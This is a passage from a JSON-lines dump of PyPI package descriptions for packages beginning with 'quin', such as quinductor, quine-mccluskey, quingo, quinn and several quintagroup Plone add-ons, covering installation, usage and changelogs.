If the ssl.key file does not exist, an adhoc ssl connection will be created.Instructions for generating certificate and ssl password.$ openssl genrsa 2048 > ssl.key\n$ openssl req -new -x509 -nodes -sha1 -days 365 -key ssl.key > ssl.cert"} +{"package": "quin", "pacakge-description": "No description available on PyPI."} +{"package": "quina", "pacakge-description": "No description available on PyPI."} +{"package": "quince", "pacakge-description": "The reference API implementation for Quincy (REST interface to StackTach.v3)"} +{"package": "quincy", "pacakge-description": "quincy> \u201cIf you want to get the answers, talk to Quincy \u2026\u201d![Quincy](images/quincy.jpg)Just like the famous forensic pathologist, you can talk to Quincy to ask\nquestions of StackTach.v3. \u201cHow happened to this instance?\u201d \u201cHow did it die?\u201d\n\u201cWho touched it last?\u201d \u201cWas it in pain?\u201dQuincy is a REST interface for StackTach.v3 \u2026 but it\u2019s only the API, there\nis no implementation. The default implementation is a dummy one for testing\npurposes. You can specify different implementations as you like. So, if\nyou have another monitoring service that you would like to expose with a\nStackTach.v3 interface, you can adopt Quincy. However, if you want to work with\nStackTach.v3, there is a [quince](https://github.com/StackTach/quince) driver\nthat handles that for you.Later in this document we will show you how to configure Quincy to use\nthe Quince drivers.The [klugman](https://github.com/StackTach/klugman) library is both a cmdline\ntool for accessingquincyand a python library for programmatically accessing it.api\u2026/v1/\n\u2026/v1/events/"} +{"package": "quinductor", "pacakge-description": "QuinductorA multilingual data-driven method for generating reading comprehension questions. The official repository for the Quinductor article:https://arxiv.org/abs/2103.10121DataWe useTyDi QA dataset, which you can easily get by runningget_tydiqa_data.shHow to work with the induced templates?Quinductor is now available as a Python package that can be installed viapip install quinductor. 
After that you can download the induce templates for your language by running the following in the Python shell (the example is for English).>>>importquinductorasqi>>>qi.download('en')The avaible languages with a wide set of templates are:Arabic (ar)English (en)Finnish (fi)Indonesian (id)Japanese (ja)Russian (ru)Templates are also available for the other languages listed below, but Quinductor did not manage to induce many templates on the TyDiQA.Korean (ko)Telugu (te)After having downloaded the templates for your language, you can get access to them by running>>>tools=qi.use('en')Starting from v0.2.0, you can also use thetoolsdictionary to quickly induce QA-pairs using the following piece of code.importquinductorasqiimportudon2tools=qi.use(\"en\")trees=udon2.ConllReader.read_file(\"example.conll\")res=qi.generate_questions(trees,tools)print(\"\\n\".join([str(x)forxinres]))Each element in thereslist above will be an instance ofGeneratedQAPairclass, which has the following properties:q-- generated question as a stringa-- generated answer as a stringscore-- the Quinductor score for this QA-pair (the list is sorted in the descending order of the scores)template-- a list of templates that resulted in the induced QA-pairHow to induce templates yourself?Generate auxiliary models:IDFs by runningcalculate_idf.shranking models by runningget_qword_stat.shInduce templates and guards by runninginduce_templates.shIf you want to induce templates only for a specific language, please choose the correpsonding lines from the shell scripts.Using your own templatesQuinductor templates constitute a plain text file with a number of induced templates. However, in order for them to be used, Quinductor requires a number of extra files in addition to the templates file:guards file -- a plain text file with guards for all templates, i.e. conditions on the dependency trees that must be satisfied for applying each templateexamples file -- a file containing the sentences from the training corpus that gave rise to each templatequestion word model -- a dill binary file containing the question word model (see the associated article for explanations), can be induced by usingqword_stat.pyscriptanswer statistics file -- a dill binary file containng the statistics about pos-morph expressions for the root tokens of the answers in the training set, used for filtering (can be induced usingqword_stat.pyscript also)pos-morph n-gram model folder -- a folder containing a number of plain text files with n-gram models of pos-morph expressions (see the associated article for more details andewt_dev_freq.txtfor the example of the file format)Quinductor templates along with all aforementioned extra files constitute a Quinductor model. 
Each such model must be organized as a folder with the following structure:|- language code\n |- pos_ngrams -- a folder with pos-morph n-gram model\n |- dataset name -- a name of the dataset used for inducing templates\n |- a unique name for templates -- a timestamp if templates induced by the script from this repo\n |- guards.txt -- guards file\n |- templates.txt -- templates file\n |- sentences.txt -- examples file\n |- atmpl.dill -- answer statistics file\n |- qwstats.dill -- question word model fileIf you want to use a custom Quinductor model, you should organize your folder according to the structure above and give the path to the folder withtemplates.txtfile as an extra argument calledtemplates_folderto theqi.usemethod, as shown below.importquinductorasqitools=qi.use('sv',templates_folder='my_templates/sv/1613213402519069')If you want only parts of a Quinductor model to differ from one of the default models, you can specify more fine-grained self-explanatory arguments to theqi.usemethod:guards_files,templates_files,pos_ng_folder,example_files,qw_stat_file,a_stat_file.How to evaluate?We usenlg-eval packageto calculate automatic evaluation metrics.\nThis package requires to have hypothesis and ground truth files, where each line correspond to a question generated based on the same sentence.\nTo generate these files, please runevaluate.sh(if you want to induce templates only for a specific language, please choose the correpsonding lines from the shell scripts.).Then automatic evaluation metrics can be calculated by running a command similar to the following (example is given for Arabic):nlg-eval --hypothesis templates/ar/1614104416496133/eval/hypothesis_ar.txt --references templates/ar/1614104416496133/eval/ground_truth_ar_0.txt --references templates/ar/1614104416496133/eval/ground_truth_ar_1.txt --references templates/ar/1614104416496133/eval/ground_truth_ar_2.txt --no-glove --no-skipthoughtsCite us@misc{kalpakchi2021quinductor,\n title={Quinductor: a multilingual data-driven method for generating reading-comprehension questions using Universal Dependencies}, \n author={Dmytro Kalpakchi and Johan Boye},\n year={2021},\n eprint={2103.10121},\n archivePrefix={arXiv},\n primaryClass={cs.CL}\n}"} +{"package": "quine-mccluskey", "pacakge-description": "A Python implementation of the Quine McCluskey algorithm.This implementation of the Quine McCluskey algorithm has no inherent limits\n(other than the calculation time) on the size of the inputs.Also, in the limited tests of the author of this module, this implementation is\nconsiderably faster than other public Python implementations for non-trivial\ninputs.Another unique feature of this implementation is the possibility to use the XOR\nand XNOR operators, in addition to the normal AND operator, to minimise the\nterms. This slows down the algorithm, but in some cases the result can be much\nmore compact than a sum of product.How to install qm.pyInstall the package withpython setup.py installThis needs superuser privileges. If you want to install the package locally,\nyou can run:mypath=XXX\nPYTHONPATH=$mypath/lib/python2.7/site-packages/ python setup.py install \u2013prefix $mypathwhere XXX can be any path. 
You may have to change the PYTHONPATH according to your\npython version."} +{"package": "quine-mccluskey-tomas789", "pacakge-description": "qm.pyA Python implementation of the Quine McCluskey algorithm.This implementation of the Quine McCluskey algorithm has no inherent limits\n(other than the calculation time) on the size of the inputs.Also, in the limited tests of the author of this module, this implementation is\nconsiderably faster than other public Python implementations for non-trivial\ninputs.Another unique feature of this implementation is the possibility to use the XOR\nand XNOR operators, in addition to the normal AND operator, to minimise the\nterms. This slows down the algorithm, but in some cases the result can be much\nmore compact than a sum of product.InstallationThe recommanded way of installing this package is by using pippython3-mpipinstallquine-mccluskey-tomas789Note that on Windows you might need to use thepycommand instead.py-mpipinstallquine-mccluskey-tomas789There are some othere means of installing the package which are recommanded only in specific cases.Development buildpython3-mpipinstall-e.Build wheel files locallyMake sure you have the latest version of PyPA's build installed:python3-mpipinstall--upgradebuildNow run this command from the same directory where pyproject.toml is located:python3-mbuildThis command should output a lot of text and once completed should generate two files in the dist directory:dist/\n\u251c\u2500\u2500 quine_mccluskey_tomas789-1.0-py2.py3-none-any.whl\n\u2514\u2500\u2500 quine_mccluskey_tomas789-1.0.tar.gzWheel file can then be distributed via your own means and installed using pippython3-mpipinstalldist/quine_mccluskey_tomas789-1.0-py2.py3-none-any.whlRunning testsUnit testsThe library comes with a basic set of unit tests. They can be executed usingpytestpytestFuzz testingWe also have a fuzz testing. It generates random formulas, simplifies them and checks that the result is correct.\u279cquine-mccluskey-tomas789git:(main)pythonfuzz.pyChecked24300formulasandfound0errors.\nChecked48400formulasandfound0errors.\nChecked72300formulasandfound0errors.\nChecked96300formulasandfound0errors.\nTestingformulas...\u280b0:00:44"} +{"package": "quine-time", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quingo", "pacakge-description": "Quingo Runtime SystemAlong with quingo compilers, the Quingo runtime system which provides users the capability to program and simulate Quingo programs.InstallationThe Quingo installation comprises of two main steps:Install the Runtime system and simulatorInstall Quingo runtime system with required simulators using the following command:pipinstall-e.# for simulators used:gitclonehttps://gitee.com/hpcl_quanta/tequila.git\ngitcheckoutxbackend\npipinstall-e.\n\ngitclonehttps://gitee.com/quingo/pyqcisim.git\ngitcheckoutbug-fix\npipinstall-e.\n\ngitclonehttps://gitee.com/quingo/SymQC.git\npipinstall-e.Upon success, it will automatically install the Quingo runtime system (this package), the PyQCAS simulator and the PyQCISim simulator.Install the Quingo compilerWe can install mlir-based quingo compiler in two ways:Install the mlir-based Quingo compiler using the following command:python-mquingo.install_quingocDownloadmlir-based Quingo compilerWindows: unzip .zip file, add directory which contains the quingoc executable file to system environment PATH.Linux: as the following sample usage, Quingoc will be installed to user defined directory, then add directory which contains the quingoc executable file to system environment PATH.quingo-compiler-0.1.4.sh-prefix=/home/user/.localMacos: uncompress .dmg file, copy quingoc executable file to user defined directory, then add directory which contains the quingoc executable file to system environment PATH.UsageA simple example can be found in the directorysrc/examples. You can simply run the bell_state example by running:cdsrc/examples/bell_state\npythonhost.pyIf everything runs correctly, you should see the following output:simres:(['Q1','Q2'],[[0,0],[0,0],[1,1],[1,1],[0,0],[0,0],[0,0],[1,1],[0,0],[1,1]])For different simulation backend, please refer tosrc/examples/sim_backend, which shows the use of SymQC, QuantumSim, and Tequila backend that are currently running stably.For different simulation modes, please refer tosrc/examples/sim_exemode, which displays the output of two different simulation results currently available.APIs of the Quingo runtime systemTheQuingo_interfaceclass expose the following methods:set_log_level():can be one ofDEBUG,INFO,WARNING,ERROR, orCRITICAL.connect_backend():currently can be'pyqcas_quantumsim'or'pyqcisim_quantumsim'.get_backend_name(): return the name of the backend that is being used. An empty string will be returned if no backend has been set.get_last_qasm(): get the qasm code generated by the last execution.config_execution(, ):Configure the execution mode to'one_shot'or'state_vector'.When the execution mode is'one_shot', the number of times to run the uploaded quantum circuit can be configured using the parameternum_shotsat the same time.call_quingo(, , *args):the main entry to call Quingo operation.: the name of the Qingo file which contains the quantum function called by the host program.: the name of the quantum function: a variable length of parameters used to call the Quingo operation in the formqg_func_name().read_result(): read the computation result from the quantum kernel.For eQASM-based backend, the result is a binary block which encodes the quantum computation result.For QCIS-based backend, the result format is defined by PyQCISim. 
Please refer to the docstring ofquingo.if_backend.non_arch_backend.pyqcisim_quantumsim.PyQCISim_quantumsim::execute()Quingo programming tutorialAt present, Qingguo runtime system has included sample programs such asBell_state,GHZ,VQE, etc. Details can be foundhere."} +{"package": "quinine", "pacakge-description": "No description available on PyPI."} +{"package": "quinn", "pacakge-description": "QuinnPyspark helper methods to maximize developer productivity.Quinn provides DataFrame validation functions, useful column functions / DataFrame transformations, and performant helper functions.SetupQuinn isuploaded to PyPiand can be installed with this command:pip install quinnQuinn Helper FunctionsimportquinnDataFrame Validationsvalidate_presence_of_columns()quinn.validate_presence_of_columns(source_df,[\"name\",\"age\",\"fun\"])Raises an exception unlesssource_dfcontains thename,age, andfuncolumn.validate_schema()quinn.validate_schema(source_df,required_schema)Raises an exception unlesssource_dfcontains all theStructFieldsdefined in therequired_schema.validate_absence_of_columns()quinn.validate_absence_of_columns(source_df,[\"age\",\"cool\"])Raises an exception ifsource_dfcontainsageorcoolcolumns.Functionssingle_space()actual_df=source_df.withColumn(\"words_single_spaced\",quinn.single_space(col(\"words\")))Replaces all multispaces with single spaces (e.g. changes\"this has some\"to\"this has some\".remove_all_whitespace()actual_df=source_df.withColumn(\"words_without_whitespace\",quinn.remove_all_whitespace(col(\"words\")))Removes all whitespace in a string (e.g. changes\"this has some\"to\"thishassome\".anti_trim()actual_df=source_df.withColumn(\"words_anti_trimmed\",quinn.anti_trim(col(\"words\")))Removes all inner whitespace, but doesn't delete leading or trailing whitespace (e.g. changes\" this has some \"to\" thishassome \".remove_non_word_characters()actual_df=source_df.withColumn(\"words_without_nonword_chars\",quinn.remove_non_word_characters(col(\"words\")))Removes all non-word characters from a string (e.g. changes\"si%$#@!#$!@#mpsons\"to\"simpsons\".multi_equals()source_df.withColumn(\"are_s1_and_s2_cat\",quinn.multi_equals(\"cat\")(col(\"s1\"),col(\"s2\")))multi_equalsreturns true ifs1ands2are both equal to\"cat\".approx_equal()This function takes 3 arguments which are 2 Pyspark DataFrames and one integer values as threshold, and returns the Boolean column which tells if the columns are equal in the threshold.let the columns be\ncol1 = [1.2, 2.5, 3.1, 4.0, 5.5]\ncol2 = [1.3, 2.3, 3.0, 3.9, 5.6]\nthreshold = 0.2\n\nresult = approx_equal(col(\"col1\"), col(\"col2\"), threshold)\nresult.show()\n\n+-----+\n|value|\n+-----+\n| true|\n|false|\n| true|\n| true|\n| true|\n+-----+array_choice()This function takes a Column as a parameter and returns a PySpark column that contains a random value from the input column parameterdf = spark.createDataFrame([(1,), (2,), (3,), (4,), (5,)], [\"values\"])\nresult = df.select(array_choice(col(\"values\")))\n\nThe output is :=\n+--------------+\n|array_choice()|\n+--------------+\n| 2|\n+--------------+regexp_extract_all()The regexp_extract_all takes 2 parameters Stringsandregexpwhich is a regular expression. 
This function finds all the matches for the string which satisfies the regular expression.print(regexp_extract_all(\"this is a example text message for testing application\",r\"\\b\\w*a\\w*\\b\"))\n\nThe output is :=\n['a', 'example', 'message', 'application']Wherer\"\\b\\w*a\\w*\\b\"pattern checks for words containing letteraweek_start_date()It takes 2 parameters, column and week_start_day. It returns a Spark Dataframe column which contains the start date of the week. By default the week_start_day is set to \"Sun\".For input[\"2023-03-05\", \"2023-03-06\", \"2023-03-07\", \"2023-03-08\"]the Output isresult = df.select(\"date\", week_start_date(col(\"date\"), \"Sun\"))\nresult.show()\n+----------+----------------+\n| date|week_start_date |\n+----------+----------------+\n|2023-03-05| 2023-03-05|\n|2023-03-07| 2023-03-05|\n|2023-03-08| 2023-03-05|\n+----------+----------------+week_end_date()It also takes 2 Paramters as Column and week_end_day, and returns the dateframe column which contains the end date of the week. By default the week_end_day is set to \"sat\"+---------+-------------+\n date|week_end_date|\n+---------+-------------+\n2023-03-05| 2023-03-05|\n2023-03-07| 2023-03-12|\n2023-03-08| 2023-03-12|\n+---------+-------------+uuid5()This function generates UUIDv5 in string form from the passed column and optionally namespace and optional extra salt.\nBy default namespace is NAMESPACE_DNS UUID and no extra string used to reduce hash collisions.df = spark.createDataFrame([(\"lorem\",), (\"ipsum\",)], [\"values\"])\nresult = df.select(quinn.uuid5(F.col(\"values\")).alias(\"uuid5\"))\nresult.show(truncate=False)\n\nThe output is :=\n+------------------------------------+\n|uuid5 |\n+------------------------------------+\n|35482fda-c10a-5076-8da2-dc7bf22d6be4|\n|51b79c1d-d06c-5b30-a5c6-1fadcd3b2103|\n+------------------------------------+Transformationssnake_case_col_names()quinn.snake_case_col_names(source_df)Converts all the column names in a DataFrame to snake_case. It's annoying to write SQL queries when columns aren't snake cased.sort_columns()quinn.sort_columns(df=source_df,sort_order=\"asc\",sort_nested=True)Sorts the DataFrame columns in alphabetical order, including nested columns if sort_nested is set to True. Wide DataFrames are easier to navigate when they're sorted alphabetically.DataFrame Helperscolumn_to_list()quinn.column_to_list(source_df,\"name\")Converts a column in a DataFrame to a list of values.two_columns_to_dictionary()quinn.two_columns_to_dictionary(source_df,\"name\",\"age\")Converts two columns of a DataFrame into a dictionary. In this example,nameis the key andageis the value.to_list_of_dictionaries()quinn.to_list_of_dictionaries(source_df)Converts an entire DataFrame into a list of dictionaries.show_output_to_df()quinn.show_output_to_df(output_str,spark)Parses a spark DataFrame output string into a spark DataFrame. Useful for quickly pulling data from a log into a DataFrame. In this example, output_str is a string of the form:+----+---+-----------+------+\n|name|age| stuff1|stuff2|\n+----+---+-----------+------+\n|jose| 1|nice person| yoyo|\n| li| 2|nice person| yoyo|\n| liz| 3|nice person| yoyo|\n+----+---+-----------+------+Schema Helpersschema_from_csv()quinn.schema_from_csv(\"schema.csv\")Converts a CSV file into a PySpark schema (akaStructType). The CSV must contain the column name and type. 
The nullable and metadata columns are optional.Here's an example CSV file:name,type\nperson,string\naddress,string\nphoneNumber,string\nage,intHere's how to convert that CSV file to a PySpark schema:schema=schema_from_csv(spark,\"some_file.csv\")StructType([StructField(\"person\",StringType(),True),StructField(\"address\",StringType(),True),StructField(\"phoneNumber\",StringType(),True),StructField(\"age\",IntegerType(),True),])Here's a more complex CSV file:name,type,nullable,metadata\nperson,string,false,{\"description\":\"The person's name\"}\naddress,string\nphoneNumber,string,TRUE,{\"description\":\"The person's phone number\"}\nage,int,FalseHere's how to read this CSV file into a PySpark schema:another_schema=schema_from_csv(spark,\"some_file.csv\")StructType([StructField(\"person\",StringType(),False,{\"description\":\"The person's name\"}),StructField(\"address\",StringType(),True),StructField(\"phoneNumber\",StringType(),True,{\"description\":\"The person's phone number\"}),StructField(\"age\",IntegerType(),False),])print_schema_as_code()fields=[StructField(\"simple_int\",IntegerType()),StructField(\"decimal_with_nums\",DecimalType(19,8)),StructField(\"array\",ArrayType(FloatType()))]schema=StructType(fields)printable_schema:str=quinn.print_schema_as_code(schema)Converts a SparkDataTypeto a string of Python code that can be evaluated as code using eval(). If theDataTypeis aStructType, this can be used to print an existing schema in a format that can be copy-pasted into a Python script, log to a file, etc.For example:print(printable_schema)StructType(\n\tfields=[\n\t\tStructField(\"simple_int\", IntegerType(), True),\n\t\tStructField(\"decimal_with_nums\", DecimalType(19, 8), True),\n\t\tStructField(\n\t\t\t\"array\",\n\t\t\tArrayType(FloatType()),\n\t\t\tTrue,\n\t\t),\n\t]\n)Once evaluated, the printable schema is a valid schema that can be used in dataframe creation, validation, etc.fromchispa.schema_comparerimportassert_basic_schema_equalityparsed_schema=eval(printable_schema)assert_basic_schema_equality(parsed_schema,schema)# passesprint_schema_as_code()can also be used to print otherDataTypeobjects.ArrayTypearray_type=ArrayType(FloatType())printable_type:str=quinn.print_schema_as_code(array_type)print(printable_type)ArrayType(FloatType())MapTypemap_type=MapType(StringType(),FloatType())printable_type:str=quinn.print_schema_as_code(map_type)print(printable_type)MapType(\n StringType(),\n FloatType(),\n True,\n)IntegerType,StringTypeetc.integer_type=IntegerType()printable_type:str=quinn.print_schema_as_code(integer_type)print(printable_type)IntegerType()Pyspark Core Class Extensionsfrom quinn.extensions import *Column ExtensionsisFalsy()source_df.withColumn(\"is_stuff_falsy\",F.col(\"has_stuff\").isFalsy())ReturnsTrueifhas_stuffisNoneorFalse.isTruthy()source_df.withColumn(\"is_stuff_truthy\",F.col(\"has_stuff\").isTruthy())ReturnsTrueunlesshas_stuffisNoneorFalse.isNullOrBlank()source_df.withColumn(\"is_blah_null_or_blank\",F.col(\"blah\").isNullOrBlank())ReturnsTrueifblahisnullor blank (the empty string or a string that only contains whitespace).isNotIn()source_df.withColumn(\"is_not_bobs_hobby\",F.col(\"fun_thing\").isNotIn(bobs_hobbies))ReturnsTrueiffun_thingis not included in thebobs_hobbieslist.nullBetween()source_df.withColumn(\"is_between\",F.col(\"age\").nullBetween(F.col(\"lower_age\"),F.col(\"upper_age\")))ReturnsTrueifageis betweenlower_ageandupper_age. Iflower_ageis populated andupper_ageisnull, it will returnTrueifageis greater than or equal tolower_age. 
Iflower_ageisnullandupper_ageis populate, it will returnTrueifageis lower than or equal toupper_age.ContributingWe are actively looking for feature requests, pull requests, and bug fixes.Any developer that demonstrates excellence will be invited to be a maintainer of the project.Code StyleWe are usingPySpark code-styleandsphinxas docstrings format. For more details aboutsphinxformat seethis tutorial. A short example ofsphinx-formated docstring is placed below:\"\"\"[Summary]:param [ParamName]: [ParamDescription], defaults to [DefaultParamVal]:type [ParamName]: [ParamType](, optional)...:raises [ErrorType]: [ErrorDescription]...:return: [ReturnDescription]:rtype: [ReturnType]\"\"\""} +{"package": "quinnat", "pacakge-description": "QuinnatQuinnat is a library for building urbit chatbots, built withUrlock.Here's how to use it:#!/usr/bin/python\n\nimport quinnat\n\nq = quinnat.Quinnat(\n \"http://localhost:8080\", # or wherever your ship is running\n \"sampel-palnet\",\n \"your-+code-here\",\n)\n\nq.connect()\n\nq.post_message(\"palnet-sampel\", \"my-chat-1234\", {\"text\": \"Hello world!\"})\n\ndef say_hello(message, replier):\n if \"hello bot\" in message.full_text:\n replier({\"text\": \"Hello \" + message.author})\n\nq.listen(say_hello)"} +{"package": "quinoa", "pacakge-description": "This is a simple package for making MUC/groupchat-aware Jabber bots. It provides a class, quinoa.Bot, which you can subclass to make your own bots. See the readme for more information."} +{"package": "quint", "pacakge-description": "No hassle Q-learning libraryQuint is a minimal path finding library useful for discrete state scenariosUsageInstall :pip install quintImport :from quint import quintInstantiate :model = quint(reward_matrix, gamma)(refer quint docstring for matrix structure)Override quint.act() to your own action functionLearn :model.learn(final_state, iterations)Trace :model.find_optimum_path(from_state)MIT LicenseCopyright (C) 2014 Abhinav Tushar"} +{"package": "quintagroup.analytics", "pacakge-description": "Quintagroup Analytics Tool for Plonequintagroup.analytics provides statistic information about your Plone site. It\nadds few content stats views of plone content workflow states, ownership and\nportlets registered on different contexts.Information provided by Quintagroup Analytics Tool allows you to see Plone site\ncontent from different perspectives. This information can be very useful while\nmigrating your site into newer Plone version, or into another CMS.With its help you can visually audit the content setup in Plone site before migration\nand compare it with the migrated website structure.UsageTo see your Plone site statistic information - navigate to \u2018Quintagroup Analytics\u2019 item\nunder Add-on Products Configuarion. Browse through all configlet tabs to see all statistic\ninformation, generated by Quintagroup Analytics Tool:Content Ownership by Type - information about most popular content types on your site. Here you\ncan see the most frequently created content types on your site and their owners.Content Ownership by State - information about site\u2019s content workflow states. Here you can see\nhow many content object are published/submitted for review/etc. and their owners.Content Types by State - information about site\u2019s most frequently created content types and their\nworkflow states.Site Portlets - information about site portlets assigned throughout site sections. This information\ncan be exported into .csv format. 
You can see all portlets assigned on your site and edit them.Legacy Portlets - information about legacy assigned throughout site sections. This information\ncan be exported into .csv format.Properties stats - information on certain property values for all site objects, such as\ntitles, descriptions, etc. This information can be exported into .csv format.CompatibilityPlone 3.x, Plone 4.xLinksProduct Homepage:http://quintagroup.com/services/plone-development/products/quintagroup.analyticsDocumentation Area:http://projects.quintagroup.com/products/wiki/quintagroup.analyticsRepository:http://svn.quintagroup.com/products/quintagroup.analyticsAuthors and contributorsMyroslav OpyrVolodymyr CherepanyakTaras MelnychukBohdan Koval\u2019Roman KozlovskyiVitaliy PodobaJulien SteglePython web development by Quintagroup, 2003-2012Changelog1.1.1 - 2012-05-31fixed syntax for python 2.4fixed tests for plone 4.2 and pyflakesfixed pep81.1 - 2012-04-11refactored configlet tabsfrench translation addedtranslations added1.0 - 2010-11-19Initial release"} +{"package": "quintagroup.canonicalpath", "pacakge-description": "Introductionquintagroup.canonicalpath package brings canonical path calculation\nfunctionality to Plone. The package allows to define path and/or link\nto the object, which may differ from standard physical path or its URL\nin portal.It\u2019s used by such products as quintagroup.seoptimizer (for defining\ncanonical link of the object) and quintagroup.plonegooglesitemaps (on\ngoogle sitemaps generation).This package is intended for bringingcanonical_pathand/orcanonical_linkproperty to any traversable object. For that purpose\nit defines ICanonicalPath and ICanonicalLink interfaces, and registers\nbasic adapters for ITraversable objects.This package also registerscanonical_pathandcanonical_linkindexes\nfor possible usage in catalog (ZCatalog).Default adapters behaviour:canonical_pathreturns path from portal root, i.e. for/plone/front-pagecanonical_path will be/front-page.canonical_linkreturns absoulute url of the object.Supported Plone version3.xAuthorsThe product was developed by Quintagroup.com team:Andriy MylenkyiTaras MelnychukVolodymyr CherepanyakPython development by Quintagroup, 2003-2012Changelog0.7 (2010-06-01)Add converters from CanonicalPath to CanonicalLink.\nUseful for migration\n[mylan]Added tests for convertors\n[mylan]Extract DefaultPropertyAdapter into separate one\nfrom DefaultCanonicalAdapter\n[mylan]Added tests of default adapters registration\n[mylan]0.6 (2010-04-19)added compatibility with plone 3.0-3.3 [fenix]added compatibility for plone 4, removed unnecessary tests [fenix]added delete property functionality for ICanonicalPath,\nICanonicalLink [mylan]added ICanonicalLink interface/adapter/tests/indexer [mylan]0.4 (2010-02-11)Reregistered base adatapter for OFS.interface.ITraversable [mylan]Rewrite indexer registration with help of plone.indexer [mylan]Removed metadata registration in portal catalog [mylan]Added tests [mylan]Added README [mylan]0.1 (2009-03-13)Initial release"} +{"package": "quintagroup.captcha.core", "pacakge-description": "IntroductionQuintagroup Captcha Core (quintagroup.captcha.core) is a core package of simple\ncaptcha implementation. 
It allows to configure captchas on your Plone site.This product works together with other Quintagroup captcha products.\nTo protect standard Plone forms with captcha - use quintagroup.plonecaptchas package.https://pypi.python.org/pypi/quintagroup.plonecaptchasquintagroup.captcha.core UsageAfter product installation you\u2019ll see \u2018Plone captchas setup\u2019 option under\n\u2018Add-on Product Configuration\u2019 in Site Setup. There you can select what kind\nof captchas you want to appear: either static or dynamic. In case you select\ndynamic - captcha images will be generated on the fly and you will be able to\nconfigure captchas look by using different font sizes, background and font\ncolours, period, amplitude, random values.CompatibilityPlone 3.xPlone 4.xLinksDocumentation -http://projects.quintagroup.com/products/wiki/quintagroup.captcha.coreSVN Repository -http://svn.quintagroup.com/products/quintagroup.captcha.coreNotesIf you want captcha for Plone default forms - use quintagroup.plonecaptchas producthttp://projects.quintagroup.com/products/wiki/quintagroup.plonecaptchasIf you want captcha support for PloneFormGen forms - use quintagroup.pfg.captcha producthttp://projects.quintagroup.com/products/wiki/quintagroup.pfg.captchaAuthorsThe product is developed and maintained byhttp://quintagroup.comteam.Andriy MylenkyyVolodymyr CherepanyakCopyright (c) \u201cQuintagroup\u201d:http://quintagroup.com, 2004-2010Changelog0.4.3 - (2013-07-04)Added the backward compatibility with Python 2.4 [potar]0.4.2 - (2013-06-26)Added transifex config [kroman0]Updated French translations from transifex, many thanks to Marc Sokolovitch\n[kroman0]Added inline validation detector [vmaksymiv]0.4.1 - (2013-02-11)Fixed ValueError on validation for dynamic captcha [kroman0]Fixed AttributeError on validation [kroman0]0.4 - (2013-01-17)Updated pt_BR translation [cleber_jsantos]Updated classifiers [vmaksymiv]Cleanup code [vmaksymiv]Fixed ValueError on validation [kroman0]0.3 - (2011-07-22)Plone 4.1 comopatibility release [chervol]0.2.4 - (2010-09-08)removed tabindex from configlet [chervol]0.2.3 -(2010-09-08)fixed import errors [chervol]0.2.2 - (2010-07-19)Added German translation\n[Fabian Reinhard]0.2.1 (2010-06-17)Fixed captcha_widget issue\n(http://plone.org/products/plone-comments/issues/5)\n[mylan]0.2 - June 9, 2010Added Plone-4 support [mylan, kroman0]Added italian translation [kroman0]Updated translations [olha, mylan]Added, updated tests [mylan]0.1 - Apr 7, 2010Initial release"} +{"package": "quintagroup.catalogupdater", "pacakge-description": "quintagroup.catalogupdater package is intended for extending ZCatalog API\nwith possiblity to update selected columns only. This package registers\n\u2018catalog_updater\u2019 utility for that.To simplify usage of the utility, quintagroup.catalogupdater extends GenericSetup\u2019s\nZCatalog XMLAdapter handler, which allows toupdateattribute usage incolumntag ofcatalog.xmlfile.So, when you add a new column to the catalog, you add catalog.xml file\nin some profile with following part:...\n\n...This addsnew_columnmetadata to the portal_catalog, BUT, this\nmetadata will be empty untill you rebuild the catalog. To automate\nthis step you can add \u2018update=\u201dTrue\u201d\u2019 attribute to the tag. And this\nwill lead to column update after adding. 
Thus, result usage should look\nlike this:...\n\n...It also supports subtransactions, based on threshold property of ZCatalog.InstallationSee docs/INSTALL.txt file within product package for instructions.RequirementsPlone 3.xPlone 4.0AuthorAndriy MylenkyiPython development by Quintagroup, 2004-2012Changelog0.1.1 - Mar 24, 2010added compatibility for Plone 40.1 - Mar 11, 2010Initial release:Registered \u2018catalog_updater\u2019 utility for list\nof columns updating [mylan]Extended ZCatalogXMLAdapter forupdateproperty\nsupport incolumntag [mylan]Tests added [mylan]Documentation files prepared for initial public release [olha]"} +{"package": "quintagroup.doublecolumndocument", "pacakge-description": "IntroductionThis package provides document-like plone content type which has two content\ncolumns.Supported Plone versions3.xAuthorsMyroslav OpyrAndriy MylenkyyVitaliy PodobaYuriy HvozdovychPlone Development by Quintagroup, 2004-2012Changelog0.2 - March 25, 2009reStructed ;-) documentation.\n[piv]Made it compatible with plone 3.\n[piv]Made it in a zope 3/plone 3 way.\n[piv]Made it as a python egg.\n[piv]Updated translations.\n[piv]Fixed a few css issues.\n[gvizdyk]0.1.5Added \u201cvisualClear\u201d div in view template.0.1.4DoubleColumnDocument moved to ATCT.Tested on Plone 2.50.1.3Miscellaneous cleanups in HISTORY.txt,\ndoublecolumndocument_view.pt, DoubleColumnDocument.py.0.1.2Review translation widget\u2019s properties of\ndescription field of DoubleColumnDocument class.Add i18n translation to product with\nSpanish, Argentine-Spanish languages.0.1.1Renamed Dou\u201dd\u201dleColumnDocument to Dou\u201db\u201dleColumnDocument .In DoubleColumnDocument class, in schema\nattribute BaseFolderSchema to BaseSchema.In\nDoubleColumnDocument/skins/doublecolumndocument/doublecolumndocument_view.pt\nreviewed for correct rendering of different mimetype content in view mode.Updated propertied of Body1 & Body2 fields.Add i18n translation to product with Ukrainian languages.0.1basic functionality"} +{"package": "quintagroup.dropdownmenu", "pacakge-description": "The product allows you to build a responsive multilevel drop-down menu that will\nprovide your visitors with organized and intuitive navigation. On mobile devices\nyour top menu bar transforms into one drop-down. By clicking on the title or\na small arrow next to it all-level menu items appear below the title.This package allows to build dropdown menu through the web with portal_actions.\nSubmenus are built from a tree of nested Category Actions and Actions.The other strategy used to populate submenus is Plone default NavigationStrategy,\nthe one used in navigation portlet.This project is successor of qPloneDropDownMenu.Building you dropdown menu with portal_actionsStarting from Plone 3 portal actions introduced CMF Action Category\ncontainers, it opened opportunity to build nested actions trees. Though CMF Action\nCategory does not behave as a regular action, it has different set of properties.\nWe introduced convention in quintagroup.dropdownmenu that requires to have\na specially named Action for each Actions Category. 
